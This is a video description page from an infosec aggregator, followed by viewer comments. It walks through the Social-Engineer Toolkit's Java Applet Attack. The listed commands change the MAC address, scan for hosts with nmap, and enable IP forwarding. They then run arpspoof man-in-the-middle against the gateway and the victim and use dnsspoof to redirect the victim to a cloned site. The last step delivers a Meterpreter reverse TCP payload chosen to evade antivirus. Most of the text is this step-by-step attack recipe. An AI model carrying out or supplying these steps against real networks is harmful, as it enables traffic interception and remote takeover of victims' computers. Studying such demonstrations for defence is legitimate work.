Description: Demonstration of SET's Java Applet Attack to bypass anti-virus software and obtain Meterpreter shell.
Video Notes:
ifconfig (View NIC information)
macchanger -a eth0 (Change MAC Address)
nmap -sn -n 10.10.100.* | grep Nmap (Scan for hosts)
route -n (Identify the Gateway)
10.10.100.254 (Gateway)
10.10.100.30 (Attacker)
10.10.100.16 (Victim)
ping 10.10.100.16 (Verify Connectivity)
echo 1 > /proc/sys/net/ipv4/ip_forward (Enables IP forwarding)
cat /proc/sys/net/ipv4/ip_forward (View status of IP forwarding)
pico dns (Create DNS table for dnsspoof)
arpspoof -i eth0 -t 10.10.100.254 10.10.100.16 (Man in the middle attack part 1)
arpspoof -i eth0 -t 10.10.100.16 10.10.100.254 (Man in the middle attack part 2)
dnsspoof -i eth0 -f dns (Website Redirect)
SET menu
1 -> Social Engineering Attacks
2 -> Website Attack Vectors
1 -> Java Applet Attack Method
2 -> Website Cloner
13-> ShellCodeExec Alphanum Shellcode
1 -> Windows Meterpreter Reverse TCP
I apologize in advance for the poor editing and TTS narrator. My next videos should be better.
Thanks
Tags: metasploit , meterpreter , arpspoof , dnsspoof , bypass AV , MITM ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Clear and interesting - thank you.
I have a couple of questions:
1. The victim was logged in as Admin. Would it succeed if it had been a non-Admin account?
2. You mentioned making the attack cleaner by customizing the Java applet to include only the required payload. You mentioned learning how to do this attack with Metasploit. Would you consider running through this in a future video?
I'm looking forward to your future contributions.
Yep - very clear and nice, please continue the series ;)
Had no idea SET now included shellcodeexec - but couple of months back I remember compiling and testing this code snippet with metasploit payloads:
https://github.com/inquisb/shellcodeexec
@Ignatius - check the text in the link above to get an idea of how this works, I guess SET uses something like this.
@Ignatius
I verified if the attack would work if the victim wasn't an administrator... the attack failed. When I tried to run the "bypassuac" script, the victim received a prompt for the admin password. If this is possible, it's above my realm of knowledge.
I'll be making more videos :)
I really enjoyed your video, there where no music (quite stupid making tutorial and then have some techo/rnb in the background :/).
And you descriped it very well looking forward ! <3
continue! they are usefull :)
Good video. I like that you show everything up to date and that you don't need a completely unpatched system to pull this off.